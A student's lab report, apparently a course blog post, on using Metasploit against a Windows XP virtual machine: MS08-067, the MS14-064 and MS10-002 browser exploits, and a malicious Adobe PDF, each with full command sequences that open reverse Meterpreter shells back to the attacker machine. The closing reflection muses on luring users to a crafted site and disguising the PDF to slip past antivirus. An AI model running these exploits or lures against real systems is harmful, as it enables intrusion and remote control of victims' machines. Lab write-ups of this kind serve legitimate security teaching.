20174311 唐嘉 Exp6 MSF基础应用

 

      一、实践内容

    本实践目标是掌握metasploit的基本应用方式,重点掌握常用的三种攻击方式的思路。

    二、实践过程     

    靶机:Windows XP,IP地址为192.168.80.128

    攻击机:IP地址为192.168.80.135

  (一)主动攻击实践

       MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行。

    攻击机与靶机能够互相ping通。(记得关xp的防火墙)

    攻击机使用指令nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.80.128查看靶机的ms08_067漏洞是否存在。可以看到漏洞是存在的。

     打开msf,查看靶机445端口是否开放,可以看到445端口开放。

     search portscan
     use auxiliary/scanner/portscan/tcp
     set RHOSTS 192.168.80.128
     exploit

     对靶机进行攻击。可以看到回连成功,输入ipconfig验证。

     use exploit/windows/smb/ms08_067_netapi
     set payload generic/shell_reverse_tcp
     set RHOST 192.168.80.128
     set LHOST 192.168.80.135
     exploit

 

       (二)针对浏览器的攻击

    1.MS14_064漏洞

    MS14_064漏洞是Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。远程攻击者利用此漏洞构造的网址执行任意代码,能够影响Win95+IE3—Win10+IE11的全版本。

    use exploit/windows/browser/ms14_064_ole_code_execution set payload windows/meterpreter/reverse_tcp
    set SRVHOST 192.168.80.128
    set AllowPowerShellPrompt 1
    set LHOST 192.168.80.135
    set LPORT 4311
    set target 0
    exploit

 

     在XP系统的浏览器中输入得到的URL中的网址,XP端完成打开网页后,在kali中Ctrl+C退出当前进程,输入sessions,可以看到当前建立了会话。

     输入sessions -i 1获得第一个会话的链接,输入ipconfig,可以看到攻击成功。

     2.MS10_002漏洞

     MS10_002漏洞是针对微软Internet Explorer“极光”内存损坏的攻击,当用户查看特制网页时允许远程执行代码use。

     打开msf控制台,输入:

     exploit/windows/browser/ms10_002_aurora
     set paylaod windows/meterpreter/reverse_tcp
     set srvhost 192.168.80.135
     set lport 1211

     在kali中Ctrl+C退出当前进程,输入sessions,可以看到当前建立的会话ID为1,输入sessions -i 1进入会话,即可回连成功。      

  (三)针对客户端的攻击

    Adobe的攻击主要是通过社会工程学将文档发送给用户,打开文档就会触发恶意漏洞。

    打开msf,输入以下指令:

    use windows/fileformat/adobe_cooltype_sing
    set payload windows/meterpreter/reverse_tcp

    set FILENAME 20174311.pdf
    set LHOST 192.168.80.135
    set RHOST 192.168.80.128
    set LPORT 4311
    exploit

    根据文件存放的目录,用cp指令复制到桌面上,然后拖到主机桌面上,再移动到XP虚拟机中,同时将已经下载好的adobe软件拖到XP虚拟机中并安装。

    返回kali端,输入back退出当前模块,输入如下指令进入监听模块开始监听:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.80.135 //攻击机IP
    set LPORT 4311 //攻击机端口
    exploit

    靶机中打开pdf,然后在靶机中等待回连。

    回连成功:

  (四)应用辅助模块(唯一)

    1.scanner/netbios/nbname(从netbios获取信息)

    攻击机:kali linux(ip:192.168.80.135)靶机:windows XP Professional(ip:192.168.80.128)

    进入msf输入show auxiliary指令,查看可用的辅助模块。

     选择第780个scnner/netbios/nbname。

    然后输入use auxiliary/scanner/netbios/nbname,输入show options查看选项。

    设置RHOSTS:set rhosts 192.168.80.128,执行exploit返回信息:

         2.tcp端口扫描

    输入use auxiliary/scanner/portscan/tcp 扫描目标主机上TCP使用的端口号;set RHOST 192.168.80.128设置靶机ip。

    3.smb_version

    输入scanner/smb/smb_version查看靶机的smb版本,set RHOST 192.168.80.128设置靶机ip。

 

         4.udp

    输入use auxiliary/scanner/discovery/udp_sweep检测目标主机上常用的udp服务,set RHOSTS 192.168.80.128设置靶机ip。

 

    三、实践总结

   (一)基础问题回答

     1.用自己的话解释什么是exploit,payload,encode.

           exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。

     payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即进行攻击时攻击者想要执行的。

     ecode:编码器,对代码进行异或、祛除坏字符及其他编码,保护攻击载荷不被发现,即将代码进行改造,使之不容易被发现。

   (二)总结与体会

    这次实验总体来说操作不是很困难,就是两台虚拟机在电脑上跑有时会卡死,但只要有耐心等待就好了。本次实验也让我对msf功能的强大有了进一步的认识,但是发现自己对msf的了解还不够,对于一些指令的理解也不透彻,实际操作中还是有很多地方有疑惑的,而且xp系统现在用的已经不多了,只是利用这个能够对实验内容有一个更好的理解,总的来说收获比较大,也希望在接下来的学习中能够有更深入的了解。

   (三)离实战还缺些什么技术或步骤

    我们通过实验初步操作了渗透、免杀和攻击等,但在实战中如何让靶机运行我们制作的病毒木马文件是我们容易忽视的或者说比较理想化的,拿这次实验内容来说,在浏览器攻击时,靶机需要主动的去访问URL,因此我们需要考虑如何包装这样一个网站,能够让用户去点击它;还有一个就是针对客户端的攻击时,如何想办法伪装pdf文件让用户放到自己的主机上,而且不被检测到(再把文件拖到主机上时我的360报警了的),可能更有助于实战操作。

 

posted @ 2020-04-30 23:19  香锅加点辣  阅读(276)  评论(0编辑  收藏  举报